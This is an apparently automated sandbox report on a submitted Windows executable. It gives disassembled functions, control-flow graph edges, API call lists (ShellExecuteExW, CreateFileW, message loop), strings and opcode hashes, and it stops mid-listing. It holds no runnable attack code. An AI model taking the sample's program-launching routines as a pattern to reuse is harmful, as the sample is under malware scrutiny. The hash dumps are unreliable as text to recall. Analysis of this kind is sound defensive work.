                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                      • String ID: \
                                                                                                                                                      • API String ID: 3569833718-2967466578
                                                                                                                                                      • Opcode ID: 894ee5d12869051d0ea812a326a8e0833c952c2ca68af8a3496532523140db73
                                                                                                                                                      • Instruction ID: deaa2e45347be5591e5321dc75506658a3168480a1c36ca9c99cd8826b6e6630
                                                                                                                                                      • Opcode Fuzzy Hash: 894ee5d12869051d0ea812a326a8e0833c952c2ca68af8a3496532523140db73
                                                                                                                                                      • Instruction Fuzzy Hash: DA310171249700BFE300DF60DC49F6FBBECEF95711F400628F9559A2A1D7B099858BA6
                                                                                                                                                      Function 00A438A0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 291windowCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 632 a438a0-a438bc call a457d8 635 a43bc7-a43bd4 call a21a66 call a45787 632->635 636 a438c2-a438c8 632->636 636->635 637 a438ce-a438f4 call a471f0 636->637 644 a438f6 637->644 645 a438fd-a43909 637->645 644->645 646 a4390d-a43916 645->646 647 a4390b 645->647 648 a43924-a43927 646->648 649 a43918-a4391b 646->649 647->646 652 a43929 648->652 653 a4392b-a43935 648->653 650 a4391d 649->650 651 a4391f-a43922 649->651 650->651 651->653 652->653 654 a439ce 653->654 655 a4393b-a43948 653->655 658 a439d1-a439d3 654->658 656 a4394c-a43956 655->656 657 a4394a 655->657 659 a4398c-a43999 656->659 660 a43958 656->660 657->656 661 a439d5-a439da 658->661 662 a439dc-a439de 658->662 663 a4399d-a439a7 659->663 664 a4399b 659->664 665 a4396f-a43972 660->665 661->662 666 a439ff-a43a11 call a31383 661->666 662->666 667 a439e0-a439e7 662->667 670 a43bd7-a43bdd 663->670 671 a439ad-a439b2 663->671 664->663 672 a43974 665->672 673 a4395a-a4395f 665->673 685 a43a13-a43a20 call a38da4 666->685 686 a43a29-a43a64 call a214a7 call a2ed0d call a21a66 666->686 667->666 668 a439e9-a439f5 667->668 674 a439f7 668->674 675 a439fc 668->675 676 a43be1-a43be8 670->676 677 a43bdf 670->677 679 a439b4 671->679 680 a439b6-a439bc 671->680 672->659 681 a43961 673->681 682 a43963-a4396d 673->682 674->675 675->666 683 a43c00-a43c06 676->683 684 a43bea-a43bf0 676->684 677->676 679->680 680->670 687 a439c2-a439c5 680->687 681->682 682->665 688 a43976-a4397b 682->688 694 a43c08 683->694 695 a43c0a-a43c14 683->695 691 a43bf4-a43bfd 684->691 692 a43bf2 684->692 685->686 700 a43a22 685->700 705 a43a66-a43a95 call a214a7 call a30e49 call a21a66 686->705 706 a43a9d-a43aac ShellExecuteExW 686->706 687->655 696 a439cb 687->696 689 a4397d 688->689 690 a4397f-a43989 688->690 689->690 690->659 691->683 692->691 694->695 695->658 696->654 700->686 740 a43a97 705->740 741 a43a9a 705->741 708 a43ab2-a43abc 706->708 709 a43b7c-a43b82 706->709 713 a43abe-a43ac0 708->713 714 a43aca-a43acc 708->714 711 a43b84-a43b99 709->711 712 a43bb7-a43bc3 709->712 716 a43bae-a43bb6 call a45726 711->716 717 a43b9b-a43bab call a219a9 711->717 712->635 713->714 718 a43ac2-a43ac8 713->718 719 a43ae5-a43af6 WaitForInputIdle call a43fcf 714->719 720 a43ace-a43ad7 IsWindowVisible 714->720 716->712 717->716 718->714 726 a43b30-a43b3b CloseHandle 718->726 727 a43afb-a43b02 719->727 720->719 721 a43ad9-a43ae3 ShowWindow 720->721 721->719 730 a43b4c-a43b53 726->730 731 a43b3d-a43b4a call a38da4 726->731 727->726 733 a43b04-a43b06 727->733 736 a43b55-a43b57 730->736 737 a43b6b-a43b6d 730->737 731->730 731->737 733->726 739 a43b08-a43b17 GetExitCodeProcess 733->739 736->737 743 a43b59-a43b5f 736->743 737->709 738 a43b6f-a43b71 737->738 738->709 745 a43b73-a43b76 ShowWindow 738->745 739->726 746 a43b19-a43b22 739->746 740->741 741->706 743->737 744 a43b61 743->744 744->737 745->709 747 a43b24 746->747 748 a43b29 746->748 747->748 748->726
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A438A7
                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00A43AA4
                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00A43ACF
                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00A43ADD
                                                                                                                                                      • WaitForInputIdle.USER32(?,000007D0), ref: 00A43AED
                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00A43B0F
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A43B33
                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 00A43B76
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                                                                                                                      • String ID: .exe$.inf
                                                                                                                                                      • API String ID: 3208621885-3750412487
                                                                                                                                                      • Opcode ID: 053cb2b1ed1aa9a3948f28255852e2f0c7df4dfb195aad39049a2f92128fd06d
                                                                                                                                                      • Instruction ID: 411befd3d03cd59f93898131fa005fdfa887b6b41f2b4eea7d6e63e39365de65
                                                                                                                                                      • Opcode Fuzzy Hash: 053cb2b1ed1aa9a3948f28255852e2f0c7df4dfb195aad39049a2f92128fd06d
                                                                                                                                                      • Instruction Fuzzy Hash: A0B1BD36E00258DFCF21DFA4D9957ED77B5EF84310F248129E848AB251D7B0AE868B50
                                                                                                                                                      Function 00A3F2CE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1052 a3f2ce-a3f2f7 GetClassNameW 1053 a3f2f9-a3f30e call a38da4 1052->1053 1054 a3f31f-a3f321 1052->1054 1060 a3f310-a3f31c FindWindowExW 1053->1060 1061 a3f31e 1053->1061 1056 a3f323-a3f325 1054->1056 1057 a3f32c-a3f338 call a45734 1054->1057 1056->1057 1060->1061 1061->1054
                                                                                                                                                      APIs
                                                                                                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00A3F2EF
                                                                                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A3F326
                                                                                                                                                        • Part of subcall function 00A38DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00A30E3F,?,?,?,00000046,00A31ECE,00000046,?,exe,00000046), ref: 00A38DBA
                                                                                                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A3F316
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                      • String ID: @UJu$EDIT
                                                                                                                                                      • API String ID: 4243998846-1013725496
                                                                                                                                                      • Opcode ID: 559ad5fbbaa02ddb34fca1daf76ec13ba9d3d2d40016844e835b9d97f291283d
                                                                                                                                                      • Instruction ID: ad3a5cbc84e5e2436ba1128a4f52d4bfb0adfb140e062e96351026b3ce70a5f5
                                                                                                                                                      • Opcode Fuzzy Hash: 559ad5fbbaa02ddb34fca1daf76ec13ba9d3d2d40016844e835b9d97f291283d
                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0C231A01218ABDB20EB74DD05F9FB7AC9F85B40F010065BA00FB181DAB4AA4686A5
                                                                                                                                                      Function 00A2E180 Relevance: 7.7, APIs: 5, Instructions: 183filetimeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1063 a2e180-a2e1c9 1064 a2e1d4 1063->1064 1065 a2e1cb-a2e1ce 1063->1065 1067 a2e1d6-a2e1e6 1064->1067 1065->1064 1066 a2e1d0-a2e1d2 1065->1066 1066->1067 1068 a2e1e8 1067->1068 1069 a2e1ee-a2e1f8 1067->1069 1068->1069 1070 a2e1fa 1069->1070 1071 a2e1fd-a2e22a 1069->1071 1070->1071 1072 a2e232-a2e238 1071->1072 1073 a2e22c 1071->1073 1074 a2e23a 1072->1074 1075 a2e23c-a2e254 CreateFileW 1072->1075 1073->1072 1074->1075 1076 a2e316 1075->1076 1077 a2e25a-a2e28a GetLastError call a3169a 1075->1077 1079 a2e319-a2e31c 1076->1079 1083 a2e2be 1077->1083 1084 a2e28c-a2e293 1077->1084 1081 a2e32a-a2e32e 1079->1081 1082 a2e31e-a2e321 1079->1082 1086 a2e330-a2e333 1081->1086 1087 a2e34f-a2e360 1081->1087 1082->1081 1085 a2e323 1082->1085 1091 a2e2c1-a2e2cb 1083->1091 1088 a2e295 1084->1088 1089 a2e298-a2e2b8 CreateFileW GetLastError 1084->1089 1085->1081 1086->1087 1090 a2e335-a2e34c SetFileTime 1086->1090 1092 a2e362-a2e370 call a225c3 1087->1092 1093 a2e374-a2e39a call a21a66 call a45734 1087->1093 1088->1089 1089->1083 1094 a2e2ba-a2e2bc 1089->1094 1090->1087 1095 a2e300-a2e314 1091->1095 1096 a2e2cd-a2e2e2 1091->1096 1092->1093 1094->1091 1095->1079 1099 a2e2f7-a2e2ff call a45726 1096->1099 1100 a2e2e4-a2e2f4 call a219a9 1096->1100 1099->1095 1100->1099
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,5C02E116,?,?,00000000,?,?,00000000,00A59E6B,000000FF), ref: 00A2E248
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00A59E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00A2E25A
                                                                                                                                                      • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00A59E6B,000000FF,?,00000011), ref: 00A2E2A6
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00A59E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00A2E2AF
                                                                                                                                                      • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00A59E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00A2E346
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                      • Opcode ID: 07de37f65f96a7f23def3bfa04d8d04ab4b2065969dacb4d8734f21ba3f1bd47
                                                                                                                                                      • Instruction ID: 63382d2976215a79eb92c3dea1b9b06b934836cede985dbcdaa0c5ac62741efd
                                                                                                                                                      • Opcode Fuzzy Hash: 07de37f65f96a7f23def3bfa04d8d04ab4b2065969dacb4d8734f21ba3f1bd47
                                                                                                                                                      • Instruction Fuzzy Hash: 48618D71904359EFDF24CFA8E985BEE7BB4FB04324F204629F81597280D774A984CB94
                                                                                                                                                      Function 00A374EC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1109 a374ec-a37536 call a377cf ReleaseSemaphore 1112 a37556-a3758a DeleteCriticalSection CloseHandle * 2 1109->1112 1113 a37538 1109->1113 1114 a3753b-a37554 call a375ed CloseHandle 1113->1114 1114->1112
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A377CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00A273B8), ref: 00A377E1
                                                                                                                                                        • Part of subcall function 00A377CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00A273B8), ref: 00A377F5
                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000,5C02E116,?,?,00000001,00000000,00A5A603,000000FF,?,00A390B9,?,?,00A25630,?), ref: 00A3752A
                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?), ref: 00A37544
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00A3755D
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00A37569
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00A37575
                                                                                                                                                        • Part of subcall function 00A375ED: WaitForSingleObject.KERNEL32(?,000000FF,00A3770A,?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375F3
                                                                                                                                                        • Part of subcall function 00A375ED: GetLastError.KERNEL32(?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375FF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1868215902-0
                                                                                                                                                      • Opcode ID: cb0b313f2968d981f077f16a46bdfb4f76cf860e7075b72d751fa5efc234bd2d
                                                                                                                                                      • Instruction ID: 763dcf786d376dad27883141a115ec966e4285d8b2eacc8861b6476a05b8b170
                                                                                                                                                      • Opcode Fuzzy Hash: cb0b313f2968d981f077f16a46bdfb4f76cf860e7075b72d751fa5efc234bd2d
                                                                                                                                                      • Instruction Fuzzy Hash: F9118472504704EFD722DFA4DD84FCAFBA9FB08761F404929F157921A0CB71A942CB50
                                                                                                                                                      Function 00A40678 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1117 a40678-a40691 PeekMessageW 1118 a40693-a406a7 GetMessageW 1117->1118 1119 a406cc-a406ce 1117->1119 1120 a406b8-a406c6 TranslateMessage DispatchMessageW 1118->1120 1121 a406a9-a406b6 IsDialogMessageW 1118->1121 1120->1119 1121->1119 1121->1120
                                                                                                                                                      APIs
                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A40689
                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4069A
                                                                                                                                                      • IsDialogMessageW.USER32(00010452,?), ref: 00A406AE
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00A406BC
                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00A406C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1266772231-0
                                                                                                                                                      • Opcode ID: 0b4d84b400960899b55891ee83de9e128e11ba9a4d7b3d8eb233f3137e79322c
                                                                                                                                                      • Instruction ID: b04689e85daa997ab1ff5a3ba853e2c3785b11140612018784f17b3362ed6aee
                                                                                                                                                      • Opcode Fuzzy Hash: 0b4d84b400960899b55891ee83de9e128e11ba9a4d7b3d8eb233f3137e79322c
                                                                                                                                                      • Instruction Fuzzy Hash: DEF0BDB190622AAB9B20EBE2EC4CDDF7FACEE452517418415B50AD2050E6B4D547CAB0
                                                                                                                                                      Function 00A42813 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 301COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1122 a42813-a42845 call a27673 1125 a42847 1122->1125 1126 a4284a-a42850 1122->1126 1125->1126 1127 a42856-a4285b 1126->1127 1128 a42abd 1126->1128 1129 a42860-a4286e 1127->1129 1130 a4285d 1127->1130 1131 a42abf-a42ac3 1128->1131 1132 a42896 1129->1132 1133 a42870-a4287c 1129->1133 1130->1129 1134 a42ac5-a42ac8 1131->1134 1135 a42ace-a42ad2 1131->1135 1137 a42899-a4289c 1132->1137 1133->1132 1136 a4287e 1133->1136 1138 a42af7 1134->1138 1139 a42aca-a42acc 1134->1139 1135->1138 1140 a42ad4-a42ad7 1135->1140 1141 a42884-a42888 1136->1141 1142 a42ab7 1137->1142 1143 a428a2-a428a7 1137->1143 1146 a434ad-a43500 call a258cb 1138->1146 1144 a42ada-a42af2 call a27673 call a438a0 1139->1144 1140->1138 1145 a42ad9 1140->1145 1147 a429f0-a429f2 1141->1147 1148 a4288e-a42894 1141->1148 1142->1128 1149 a428ac-a428d7 call a4acee call a21afc 1143->1149 1150 a428a9 1143->1150 1144->1138 1145->1144 1161 a43504-a43514 call a30d1d 1146->1161 1162 a43502 1146->1162 1147->1132 1153 a429f8-a429fc 1147->1153 1148->1132 1148->1141 1149->1146 1164 a428dd-a428e1 1149->1164 1150->1149 1153->1137 1171 a43516-a4351c 1161->1171 1172 a4356a-a4356f call a45787 1161->1172 1162->1161 1166 a428e5-a428ec 1164->1166 1167 a428e3 1164->1167 1169 a428f1-a4292f call a2120c call a3645a 1166->1169 1170 a428ee 1166->1170 1167->1166 1187 a42935-a42937 1169->1187 1170->1169 1174 a43520-a43526 1171->1174 1175 a4351e 1171->1175 1179 a43533-a43565 call a29733 call a21150 call a225a4 call a21a66 * 2 1174->1179 1180 a43528-a43531 call a313da 1174->1180 1175->1174 1179->1172 1180->1172 1180->1179 1189 a42a01-a42a07 1187->1189 1190 a4293d-a4299f call a214a7 call a2adaa call a21a66 call a214a7 call a2adaa call a21a66 1187->1190 1192 a42a4e-a42a68 1189->1192 1193 a42a09-a42a24 1189->1193 1225 a429a4-a429d2 call a214a7 call a2adaa call a21a66 1190->1225 1226 a429a1-a429a3 1190->1226 1200 a42aaf-a42ab5 1192->1200 1201 a42a6a-a42a85 1192->1201 1197 a42a45-a42a4d call a45726 1193->1197 1198 a42a26-a42a3f call a219a9 1193->1198 1197->1192 1198->1197 1200->1131 1206 a42aa6-a42aae call a45726 1201->1206 1207 a42a87-a42aa0 call a219a9 1201->1207 1206->1200 1207->1206 1233 a429d4-a429d6 1225->1233 1234 a429d7-a429eb call a3645a 1225->1234 1226->1225 1233->1234 1234->1187
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                      • String ID: HIDE$MAX$MIN
                                                                                                                                                      • API String ID: 176396367-2426493550
                                                                                                                                                      • Opcode ID: 448adac1aadc5c995a45d7f7c043aad51b35ef293646a444128db3054edbd3cd
                                                                                                                                                      • Instruction ID: ade3f86bb543d82876d381a7e2a896d033f8209fdfde02e3278251827dff8c0e
                                                                                                                                                      • Opcode Fuzzy Hash: 448adac1aadc5c995a45d7f7c043aad51b35ef293646a444128db3054edbd3cd
                                                                                                                                                      • Instruction Fuzzy Hash: 88B19176C00268DECF25DFA8CD85BDDBBB8BF99310F5405AAE804B7141DB709A89CB51
                                                                                                                                                      Function 00A3F4D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A36C5E: __EH_prolog3_GS.LIBCMT ref: 00A36C65
                                                                                                                                                        • Part of subcall function 00A36C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00A36C9A
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00A3F4ED
                                                                                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3F524
                                                                                                                                                      • SHGetMalloc.SHELL32(00A7532C), ref: 00A3F52E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                                                                                                                      • String ID: riched20.dll
                                                                                                                                                      • API String ID: 2446841611-3360196438
                                                                                                                                                      • Opcode ID: 03bf7b054d61143d2795236eae266992abf1f35db16ad249fd7b3c970d94dc6d
                                                                                                                                                      • Instruction ID: 8939f7b8fe57d061b416e81032e9b8b005e602c4292582774a95284401e758d4
                                                                                                                                                      • Opcode Fuzzy Hash: 03bf7b054d61143d2795236eae266992abf1f35db16ad249fd7b3c970d94dc6d
                                                                                                                                                      • Instruction Fuzzy Hash: E0F0FFB5D00209ABCB10AFA9DC499DFFBFCEF94741F008056F515E2251D7B456468BA1
                                                                                                                                                      Function 00A2E948 Relevance: 6.1, APIs: 4, Instructions: 117fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1241 a2e948-a2e961 call a457d8 1244 a2e963-a2e965 1241->1244 1245 a2e96a-a2e974 1241->1245 1246 a2eaa6-a2eaab call a45787 1244->1246 1247 a2e976-a2e983 GetStdHandle 1245->1247 1248 a2e988 1245->1248 1249 a2ea6f-a2ea72 1247->1249 1250 a2e98b-a2e998 1248->1250 1249->1250 1253 a2e99a-a2e99e 1250->1253 1254 a2e9df-a2e9f4 WriteFile 1250->1254 1256 a2e9a0-a2e9ab 1253->1256 1257 a2e9ff-a2ea03 1253->1257 1255 a2e9f7-a2e9f9 1254->1255 1255->1257 1260 a2ea9f-a2eaa2 1255->1260 1258 a2e9af-a2e9ce WriteFile 1256->1258 1259 a2e9ad 1256->1259 1257->1260 1261 a2ea09-a2ea0d 1257->1261 1258->1255 1262 a2e9d0-a2e9db 1258->1262 1259->1258 1260->1246 1261->1260 1263 a2ea13-a2ea25 call a29230 1261->1263 1262->1256 1264 a2e9dd 1262->1264 1267 a2ea77-a2ea9a call a214a7 call a29653 call a21a66 1263->1267 1268 a2ea27-a2ea30 1263->1268 1264->1255 1267->1260 1268->1250 1270 a2ea36-a2ea3a 1268->1270 1270->1250 1272 a2ea40-a2ea6c 1270->1272 1272->1249
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2E94F
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,0000002C,00A32D28,?,?,?,?,00000000,00A3ABB6,?,?,?,?,?,00A3A80E,?), ref: 00A2E978
